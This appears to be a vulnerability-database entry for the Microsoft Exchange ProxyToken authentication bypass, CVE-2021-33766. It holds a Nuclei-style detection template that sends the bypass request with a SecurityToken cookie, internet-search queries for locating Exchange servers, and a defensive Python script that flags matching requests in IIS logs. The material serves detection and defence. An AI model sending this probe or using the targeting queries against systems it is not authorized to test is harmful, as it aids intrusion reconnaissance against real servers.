CVE-2021-33766: Microsoft Exchange - Authentication Bypass

Date: 2025-08-01 | Affected software: Microsoft Exchange | PoC: public

Vulnerability description

Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.

PoC code [public]

id: CVE-2021-33766

info:
  name: Microsoft Exchange - Authentication Bypass
  author: daffainfo
  severity: high
  description: |
    Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
  reference:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766
    - https://www.zerodayinitiative.com/advisories/ZDI-21-798/
    - https://github.com/demossl/CVE-2021-33766-ProxyToken
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-33766
    epss-score: 0.93529
    epss-percentile: 0.99818
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:cve-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev,vuln

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
        Host: {{Hostname}}
        Cookie: SecurityToken=x

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<span id="msgCode">403</span>'
          - 'function signOut() {'
        condition: and

      - type: word
        part: header
        words:
          - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException"
          - "X-BEResource="
        condition: and

      - type: status
        status:
          - 403
# digest: 4a0a004730450220636e7340bcb4d22cde593bd677e87fe7c9449f8d4238dd36fe8b665d55e1660b022100ef1cd76258c4f74949ad0c8f1cb49b634e1995774a178834bd85252a38bfe9ce:922c64590222798bb761d5b6d8e72950
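
For defenders, the request shape this template sends (an e-mail address as the first path segment under /ecp/, together with a SecurityToken cookie) can be searched for in IIS W3C logs. The following is an added example, not part of the template or of the project that publishes it; it assumes the cs(Cookie) field is enabled in IIS logging, and the log lines, IP addresses and mailbox names are constructed.

```python
import re
from urllib.parse import unquote

# First path segment after /ecp/ looks like an e-mail address, as in the
# template's GET /ecp/{{email}}/PersonalSettings/HomePage.aspx
ECP_EMAIL_PATH = re.compile(r"^/ecp/([^/@\s]+@[^/@\s]+\.[^/@\s]+)/", re.IGNORECASE)
# SecurityToken cookie; IIS writes spaces inside a logged field as '+'
SECURITY_TOKEN = re.compile(r"(?:^|;[\s+]*)SecurityToken=", re.IGNORECASE)


def parse_w3c(lines):
    """Yield one dict per request, using the most recent #Fields directive."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def find_probes(lines):
    """Return (client_ip, mailbox, status) for requests with the template's shape."""
    hits = []
    for rec in parse_w3c(lines):
        path = unquote(rec.get("cs-uri-stem", ""))  # handles a %40-encoded '@'
        m = ECP_EMAIL_PATH.match(path)
        if m and SECURITY_TOKEN.search(rec.get("cs(Cookie)", "")):
            hits.append((rec.get("c-ip", "-"), m.group(1), rec.get("sc-status", "-")))
    return hits


# Constructed sample log (not taken from a real server)
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(Cookie) sc-status
2021-09-01 10:00:01 GET /ecp/default.aspx - 198.51.100.7 SecurityToken=abc 200
2021-09-01 10:00:05 GET /ecp/qwerty@abcde.com/PersonalSettings/HomePage.aspx showhelp=false 203.0.113.9 SecurityToken=x 403
2021-09-01 10:00:09 GET /ecp/user%40example.org/PersonalSettings/HomePage.aspx - 203.0.113.9 a=1;+SecurityToken=x 200
2021-09-01 10:00:12 GET /ecp/bob@example.org/PersonalSettings/HomePage.aspx - 192.0.2.4 - 403
""".splitlines()

if __name__ == "__main__":
    for ip, mailbox, status in find_probes(SAMPLE_LOG):
        print(f"{ip} -> /ecp/{mailbox}/ with SecurityToken cookie (HTTP {status})")
```

The status code is reported but not used as a filter, so a match is a lead to review against the server's patch level rather than proof of a vulnerable host.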
